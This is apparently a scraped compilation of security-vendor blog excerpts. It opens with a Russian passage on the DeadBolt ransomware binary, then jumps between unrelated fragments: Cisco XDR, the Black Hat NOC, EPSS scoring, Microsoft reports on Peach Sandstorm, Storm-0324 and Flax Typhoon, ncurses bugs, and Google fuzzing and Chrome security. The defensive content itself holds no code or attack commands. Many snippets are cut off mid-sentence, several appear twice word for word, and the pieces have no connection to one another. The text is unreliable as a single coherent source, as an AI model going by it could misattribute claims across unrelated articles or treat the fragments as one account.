Использованная в атаке программа-вымогатель DeadBolt представляет собой 32-битную программу для Linux/ARM формата ELF, разработанную на языке программирования Go.

Программа была обфусцирована и сжата упаковщиком UPX.

Также из программы удалена идентифицирующая информация о сборке Go.

Анализ такого образца может вызывать некоторые затруднения, поэтому мы более подробно остановимся на описании логики работы DeadBolt.

Для этого мы дополнительно провели полную декомпиляцию кода Go вымогателя.

The single search bar on the page made it very easy for users to understand what they had to do.

View Incident DetailsOnce an incident is selected, a drawer opens on the side.

For further details, they can click on ‘View Incident Details’ to load a detailed page of the incidents.

users can drill down again to see the raw data view.

Using progressive disclosure and this consistent display of information, Cisco XDR helps SOC analysts view the information they need to move forward and take next steps to effectively mitigate threats.

The Black Hat Network Operations Center (NOC) provides a high security, high availability network in one of the most demanding environments in the world – the Black Hat event.

We appreciate alphaMountain.ai, Pulsedive and Recorded Future donating full licenses to the Black Hat USA 2023 NOC.

Talos IR threat hunting during Black Hat USA 2023, by Jerzy ‘Yuri’ KramarzThis is the second year Talos Incident Response is supporting Network Operations Centre (NOC) during the Black Hat USA conference, in a threat hunting capacity.

Registration devices connect to an application that’s actually on the Black Hat network, hence the difference in network requirements.

About Black HatFor 26 years, Black Ha…

In this blog, we’ll cover more details about EPSS, how it compares to CVSS, as well as the role it plays in Cisco Vulnerability Management’s risk scoring.

Coupling EPSS and CVSS scoring data enables organizations to more effectively prioritize vulnerabilities based on both severity and probability of exploitation.

What It Means for Cisco Vulnerability Management CustomersRisk Scoring in the Cisco Vulnerability Management platform helps customers prioritize the vulnerabilities that pose the greatest risk to their specific organizations, while deprioritizing the ones that don’t.

By leveraging the risk score in Cisco Vulnerability Management, customers can determine which vulnerabilities pose …

Cisco is aware of reports that Akira ransomware threat actors have been targeting Cisco VPNs that are not configured for multi-factor authentication to infiltrate organizations, and we have observed instances where threat actors appear to be targeting organizations that do not configure multi-factor authentication for their VPN users.

The attackers often focus on the absence of or known vulnerabilities in multi-factor authentication (MFA) and known vulnerabilities in VPN software.

This has made it challenging to determine precisely how the Akira ransomware attackers were able to access the VPNs.

Refer to the Guide to Secure the Cisco ASA Firewall to get detailed information about best pract…

Read how Validated Design TMEs deployed ThousandEyes on Pi4s wirelessly on the Black Hat USA 2023 network to provide network assurance and actionable insights.

You got the cybersecurity internship of your dreams – now what?

Yu cemented her interest in cybersecurity through her internship.

Yu has appreciated that during her internship, “nobody ever pushes you too hard to the point where you’re stressed.

10: Consider your futureUtilizing these tips will help you use your internship to determine your next steps.

From talking with your manager about what career growth looks like in a particular industry to reflecting on the skills you like to use most or building your professional network, making the most of your cybersecurity internship starts with you.

That’s where Duo APIs come into play as a powerful tool, empowering you with resilient security controls for your applications.

Cisco Duo’s Director of Product Management, Boat Agboatwalla, shares insights into Duo Security APIs and their versatile use cases across industries.

Secure and manage your applications, users, policies, and devices with Duo APIDuo’s developer-centric approach, comprehensive documentation, SDKs, OpenAPI specifications (coming soon!

), testing environment, and support resources make it easy for developers to integrate Duo’s security solutions into their zero trust architecture.

BioConnect: BioConnect uses the Auth API endpoint and REST API to enable ‘Duo at the Door…

As a college student, the search for tech internships is key when determining your chosen career path.

Recently, interns in security at Cisco discussed how to get a tech internship by positioning yourself as an ideal candidate.

In some instances, a key portion of the technical interview will center on your knowledge of a specific area in the field.

Implementing the strategies above can help you pursue and procure an internship that you’re energized by.

Ready for your tech internship?

The discussion was based upon their research into at the view CEOs had of cyber resilience.

The second was that cyber security is not a topic to interest a CEO but cyber resilience certainly is.

One of the issues could be a possible difference between views on Cyber Resilience between Business Leaders and CISOs.

A recent report by the World Economic Forum showed a comparative difference between these two groups in their organisations cyber resilience capability.

Being trained in a situation will intuitively increase awareness of the importance of cyber resilience as well as building in response capabilities.

As our journey progressed, we identified new facts that shaped our approach to automated ransomware recovery.

A significant revelation was the limited window for response, typically less than 45 minutes[2], which drove us to think critically about the time-sensitive nature of ransomware recovery.

Ultimately, the development and implementation of automated ransomware recovery is a complex yet essential task.

We have some additional work to complete before this integration can be completed and released as a feature to Cisco XDR.

If you have Cisco XDR and you want to purchase Cohesity, please reach out to your Cisco or Cohesity sales representative.

As of June 2023, most customers and partners can request an SBOM for any supported on-premise Cisco software released after September 2022.

Considering the shared complexities across the software industry, this is an important moment to recognize in our march toward software transparency that reduces risk.

Distributing SBOMs to our customers and partners underscores Cisco’s commitment to software transparency that both improves software supply chain resiliency and reduces cascading risk.

At Cisco SBOM requirements are part of the Cisco Secure Development Lifecycle policy.

At Cisco SBOM requirements are part of the Cisco Secure Development Lifecycle policy.

Designing Windows security for the new eraToday, we shared the upcoming Windows 11 update that will be available on September 26, 2023.

OneDrive advanced security in Microsoft 365 BasicEarlier this year, we launched our most affordable subscription plan, Microsoft 365 Basic.

As promised, we’re now adding the OneDrive advanced security features in our Microsoft 365 Personal and Family plans to the Microsoft 365 Basic plan at no extra cost.

And lastly we will continue to use AI to drive a paradigm shift in security with Microsoft Security Copilot.

Also, follow us on LinkedIn (Microsoft Security) and Twitter (@MSFTSecurity) for the latest news and updates on cybersecurity.

For the fifth consecutive year, Microsoft 365 Defender demonstrated industry-leading extended detection and response (XDR) capabilities in the independent MITRE Engenuity ATT&CK® Evaluations: Enterprise.

Microsoft 365 Defender provides that visibility through ingestion of raw socket operations as well as into script content on Linux devices.

Microsoft Security Copilot, first announced at Microsoft Secure in March 2023, is the industry’s first generative AI security product that allows security teams to move at machine speed.

The single best way to prepare to realize the benefits of Microsoft Security Copilot is by adopting and deploying Microsoft 365 Defender today.

ATT&CK Evaluations | MIT…

Microsoft is proud to be recognized as a Leader in the Forrester Wave™: Zero Trust Platform Providers, Q3 2023 report.

Forrester Wave™: Zero Trust Platforms report See why Forrester recognizes Microsoft as a Leader in Zero Trust.

Forrester Wave™: Zero Trust Platforms, Q3 2023 reportWe are proud that the Microsoft Zero Trust platform has been recognized as a Leader in the Forrester Wave™: Zero Trust Platforms, Q3 2023 report, which we believe demonstrates Microsoft’s strong track record for being a comprehensive end-to-end platform.

The Forrester Wave™ is copyrighted by Forrester Research, Inc. Forrester and Forrester Wave™ are trademarks of Forrester Research, Inc.

Forrester Wave™: Zero Tru…

Microsoft is proud to be recognized as a Leader in the Forrester Wave™: Zero Trust Platform Providers, Q3 2023 report.

Forrester Wave™: Zero Trust Platforms report See why Forrester recognizes Microsoft as a Leader in Zero Trust.

Forrester Wave™: Zero Trust Platforms, Q3 2023 reportWe are proud that the Microsoft Zero Trust platform has been recognized as a Leader in the Forrester Wave™: Zero Trust Platforms, Q3 2023 report, which we believe demonstrates Microsoft’s strong track record for being a comprehensive end-to-end platform.

The Forrester Wave™ is copyrighted by Forrester Research, Inc. Forrester and Forrester Wave™ are trademarks of Forrester Research, Inc.

Forrester Wave™: Zero Tru…

In the initial phase of this campaign, Peach Sandstorm conducted password spray campaigns against thousands of organizations across several sectors and geographies.

Peach Sandstorm 2023 tradecraftPath 1: Password spray activity, internal reconnaissance with AzureHound or Roadtools, and multiple persistence mechanismsPassword spray activityBetween February and July 2023, Peach Sandstorm carried out a wave of password spray attacks attempting to authenticate to thousands of environments.

While Peach Sandstorm has carried out high-volume password spray campaigns in the past, elements of the most recent campaign were unique.

In this campaign, Peach Sandstorm installed the Azure Arc client on a …

In the initial phase of this campaign, Peach Sandstorm conducted password spray campaigns against thousands of organizations across several sectors and geographies.

Peach Sandstorm 2023 tradecraftPath 1: Password spray activity, internal reconnaissance with AzureHound or Roadtools, and multiple persistence mechanismsPassword spray activityBetween February and July 2023, Peach Sandstorm carried out a wave of password spray attacks attempting to authenticate to thousands of environments.

While Peach Sandstorm has carried out high-volume password spray campaigns in the past, elements of the most recent campaign were unique.

In this campaign, Peach Sandstorm installed the Azure Arc client on a …

Microsoft has discovered a set of memory corruption vulnerabilities in a library called ncurses, which provides APIs that support text-based user interfaces (TUI).

One of the most common vulnerabilities found in modern software, memory corruption vulnerabilities, can allow attackers to gain unauthorized access to systems and data by modifying a program’s memory.

In this blog post, we share information about ncurses and the discovered memory corruption vulnerabilities.

Due to the complicated logic required by ncurses, security issues are expected to be found, and indeed there have been numerous ncurses vulnerabilities in the past.

Extended string capabilities are parsed and appended after st…

Microsoft has discovered a set of memory corruption vulnerabilities in a library called ncurses, which provides APIs that support text-based user interfaces (TUI).

One of the most common vulnerabilities found in modern software, memory corruption vulnerabilities, can allow attackers to gain unauthorized access to systems and data by modifying a program’s memory.

In this blog post, we share information about ncurses and the discovered memory corruption vulnerabilities.

Due to the complicated logic required by ncurses, security issues are expected to be found, and indeed there have been numerous ncurses vulnerabilities in the past.

Extended string capabilities are parsed and appended after st…

Because Storm-0324 hands off access to other threat actors, identifying and remediating Storm-0324 activity can prevent more dangerous follow-on attacks like ransomware.

The actor is known to distribute the JSSLoader malware, which facilitates access for the ransomware-as-a-service (RaaS) actor Sangria Tempest (ELBRUS, Carbon Spider, FIN7).

Historical malware distribution activityStorm-0324 manages a malware distribution chain and has used exploit kit and email-based vectors to deliver malware payloads.

Storm-0324 JSSLoader infection chain based on mid-2023 activitySince as early as 2019, Storm-0324 has handed off access to the cybercrime group Sangria Tempest after delivering the group’s f…

Because Storm-0324 hands off access to other threat actors, identifying and remediating Storm-0324 activity can prevent more dangerous follow-on attacks like ransomware.

The actor is known to distribute the JSSLoader malware, which facilitates access for the ransomware-as-a-service (RaaS) actor Sangria Tempest (ELBRUS, Carbon Spider, FIN7).

Historical malware distribution activityStorm-0324 manages a malware distribution chain and has used exploit kit and email-based vectors to deliver malware payloads.

Storm-0324 JSSLoader infection chain based on mid-2023 activitySince as early as 2019, Storm-0324 has handed off access to the cybercrime group Sangria Tempest after delivering the group’s f…

Today, we announce the release of a second version of the threat matrix for storage services, a structured tool that assists in identifying and analyzing potential security threats on data stored in cloud storage services.

Victim-owned website pages may be stored on a storage account or contain links to retrieve data stored in a storage account.

The RBAC permissions of the resource instance determine the types of operations that a resource instance can perform on storage account data.

Disable cloud workload protection – Attackers may disable the cloud workload protection service which raises security alerts upon detection of malicious activities in cloud storage services.

Static website is …

Today, we announce the release of a second version of the threat matrix for storage services, a structured tool that assists in identifying and analyzing potential security threats on data stored in cloud storage services.

Victim-owned website pages may be stored on a storage account or contain links to retrieve data stored in a storage account.

The RBAC permissions of the resource instance determine the types of operations that a resource instance can perform on storage account data.

Disable cloud workload protection – Attackers may disable the cloud workload protection service which raises security alerts upon detection of malicious activities in cloud storage services.

Static website is …

Today, Microsoft Priva offers two solutions:Microsoft Priva Privacy Risk ManagementMicrosoft Priva Privacy Risk Management helps organizations manage privacy risks related to data hoarding, data overexposure, and data transfers, and empowers employees to make better data-handling decisions.

Microsoft Graph subject rights requests API integrates Priva Subject Rights Requests with in-house or partner-built privacy solutions.

What’s new with Microsoft Priva Privacy Risk Management?

Stage three of five of a delete subject rights requests in progress within the Priva Subject Rights Request solution.

We welcome you to learn more about how Microsoft Priva can help and invite you to try Microsoft P…

Today, Microsoft Priva offers two solutions:Microsoft Priva Privacy Risk ManagementMicrosoft Priva Privacy Risk Management helps organizations manage privacy risks related to data hoarding, data overexposure, and data transfers, and empowers employees to make better data-handling decisions.

Microsoft Graph subject rights requests API integrates Priva Subject Rights Requests with in-house or partner-built privacy solutions.

What’s new with Microsoft Priva Privacy Risk Management?

Stage three of five of a delete subject rights requests in progress within the Priva Subject Rights Request solution.

We welcome you to learn more about how Microsoft Priva can help and invite you to try Microsoft P…

Flax Typhoon has been active since mid-2021 and has targeted government agencies and education, critical manufacturing, and information technology organizations in Taiwan.

Flax Typhoon further uses this VPN access to scan for vulnerabilities on targeted systems and organizations from the compromised systems.

Flax Typhoon attack chainAnalysis of current campaignInitial accessFlax Typhoon achieves initial access by exploiting known vulnerabilities in public-facing servers.

While the actor’s observed behavior suggests Flax Typhoon intents to perform espionage and maintain their network footholds, Microsoft has not observed Flax Typhoon act on final objectives in this campaign.

]107 2023-06-06 …

Supply chain security is a growing issue, and we hope that greater transparency into package capabilities will help make secure coding easier for everyone.

Avoiding bad dependencies can be hard without appropriate information on what the dependency’s code actually does, and reviewing every line of that code is an immense task.

Capslock is a capability analysis CLI tool that informs users of privileged operations (like network access and arbitrary code execution) in a given package and its dependencies.

Capslock is initially rolling out for Go, a language with a strong security commitment and fantastic tooling for finding known vulnerabilities in package dependencies.

We are working to apply…

This post recounts a brief history of fuzzing on Android, shares how Google performs fuzzing at scale, and documents our experience, challenges, and success in building an infrastructure for automating fuzzing across Android.

In 2019 Android kicked off the fuzzing project, with the goal to help institutionalize fuzzing by making it seamless and part of code submission.

The Android fuzzing project resulted in an infrastructure consisting of Pixel phones and Google cloud based virtual devices that enabled scalable fuzzing capabilities across the entire Android ecosystem.

Under the Hood: How Is Android FuzzedStep 1: Define and find all the fuzzers in Android repoThe first step is to integrate …

Since 2016, OSS-Fuzz has been at the forefront of automated vulnerability discovery for open source projects.

After more than six years of running OSS-Fuzz, we now support over 1,000 open source projects with continuous fuzzing, free of charge.

The fuzzing service covers only around 30% of an open source project’s code on average, meaning that a large portion of our users’ code remains untouched by fuzzing.

Writing fuzz targets is a project-specific and manual process that is similar to writing unit tests.

But what if LLMs could write additional fuzz targets for maintainers?

As part of our effort to deploy quantum resistant cryptography, we are happy to announce the release of the first quantum resilient FIDO2 security key implementation as part of OpenSK, our open source security key firmware.

In particular, standard public key cryptography which was designed to protect against traditional computers, will not be able to withstand quantum attacks.

Fortunately, with the recent standardization of public key quantum resilient cryptography including the Dilithium algorithm, we now have a clear path to secure security keys against quantum attacks.

This cautiousness is particularly warranted for security keys as most can’t be upgraded – although we are working toward…

Chrome 106 added support for enforcing key pins on Android by default, bringing Android to parity with Chrome on desktop platforms.

This blog post explains how key pinning and the rule of two are related.

The relative risks between sandboxed processes and the browser process are why the browser process is only allowed to parse trustworthy inputs and specific IPC messages.

Security Benefits of Key Pinning in Chrome, Now on AndroidBy pinning in Chrome, we can protect users from CA compromise.

In our original implementation of pinning, the pin set is directly compiled into Chrome and updating the pin set requires updating the entire Chrome binary.

Finding and mitigating security vulnerabilities is critical to keeping Internet users safe.

Downfall (CVE-2022-40982) and Zenbleed (CVE-2023-20593) are two different vulnerabilities affecting CPUs - Intel Core (6th - 11th generation) and AMD Zen2, respectively.

Downfall shows that this instruction forwards stale data from the internal physical hardware registers to succeeding instructions.

Upon disclosures, we immediately published Security Bulletins for both Downfall and Zenbleed that detailed how Google responded to each vulnerability, and provided guidance for the industry.

As Downfall and Zenbleed, suggest, computer hardware is only becoming more complex everyday, and so we will see mor…

Although all IP-based user traffic is protected and E2EE by the Android platform, cellular networks expose circuit-switched voice and SMS traffic.

Moreover, in alignment with Android’s openness in security, we actively partner with top academic groups in cellular security research.

With upcoming Android releases, we will continue to add more features to harden the platform against cellular security threats.

We look forward to discussing the future of telco network security with our ecosystem and industry partners and standardization bodies.

We will also continue to partner with academic institutions to solve complex problems in network security.

To get security fixes to you faster, starting now in Chrome 116, Chrome is shipping weekly Stable channel updates.

We currently schedule one of these Stable channel updates (or “Stable Refresh”) between each milestone.

Anyone can view the source code, submit changes for review, and see the changes made by anyone else, even security bug fixes.

Security fixes impacting Stable channel then await the next Stable channel update once they have been backported.

By now shipping stable updates weekly, we expect the number of unplanned updates to decrease since we’ll be shipping updates more frequently.

This blog post peeks under the hood of Pixel Binary Transparency, an aspect of Pixel security that puts you in control of checking if your Pixel is running a trusted installation of its operating system.

Supply Chain Attacks & Binary TransparencyPixel Binary Transparency responds to a new wave of attacks targeting the software supply chain—that is, attacks on software while in transit to users.

The Pixel Binary Transparency log is cryptographically guaranteed to be append-only, which means entries can be added to the log, but never changed or deleted.

You can read more about the details in the Pixel Binary Transparency documentation.

More Security to ComeThe first iteration of Pixel Binary …

More than 20% are variants of previous in-the-wild 0-days from 2021 and 2020.

2022 included the detection and disclosure of 41 in-the-wild 0-days, down from the 69 in 2021.

Two key factors contributed to the higher than average number of in-the-wild 0-days for 2022: vendor transparency & variants.

In 2019 and 2020, a decent percentage of the detected in-the-wild 0-days were delivered via watering hole attacks.

Not only were over 40% of the 2020 in-the-wild 0-days variants, but more than 20% of the bugs are variants of previous in-the-wild 0-days: 7 from 2021 and 1 from 2020.

Previously in our Supply chain security for Go series, we covered dependency and vulnerability management tools and how Go ensures package integrity and availability as part of the commitment to countering the rise in supply chain attacks in recent years.

In this final installment, we’ll discuss how “shift left” security can help make sure you have the security information you need, when you need it, to avoid unwelcome surprises.

Shifting left with GoGo provides several features that help you address security early in your process, including govulncheck and pkg.go.dev discussed in Supply chain security for Go, Part 1.

Today’s post covers two more features of special interest to supply chain…

Teams are responsible for the safety of their features and ensuring that the security team is able to say ‘yes’ to its security review.

Security review focuses on the design of a proposed feature, not its details and is distinct from code review.

Security review is not an easy task – it applies security engineering insights in a social context that could become adversarial and fractious.

In some ways the purpose of a security review is to stop and think before unleashing new ideas on the world.

We can raise the level of expertise across the wider developer community, and reduce the burden of reviewing for security teams.

Most modern consumer messaging platforms (including Google Messages) support end-to-end encryption, but users today are limited to communicating with contacts who use the same platform.

This is why Google is strongly supportive of regulatory efforts that require interoperability for large end-to-end messaging platforms.

For interoperability to succeed in practice, however, regulations must be combined with open, industry-vetted, standards, particularly in the area of privacy, security, and end-to-end encryption.

With the recent publication of the IETF’s Message Layer Security (MLS) specification RFC 9420, messaging users can look forward to this reality.

This is why we intend to build MLS i…

In February, we expanded Google Workspace client-side encryption (CSE) capabilities to include Gmail and Calendar in addition to Drive, Docs, Slides, Sheets, and Meet.

More details on KACLS are available in Google Workspace Encryption Whitepaper and CSE reference API.

When receiving an email, Gmail will verify that the digital signature of the email is valid and matches the sender's identity, which protects the email against tampering.

The security of Gmail CSE is paramount to us, and we developed new additional mechanisms to ensure CSE content would be locked into a secure container.

This is done with extensive security controls to protect user data confidentiality, but also transparently …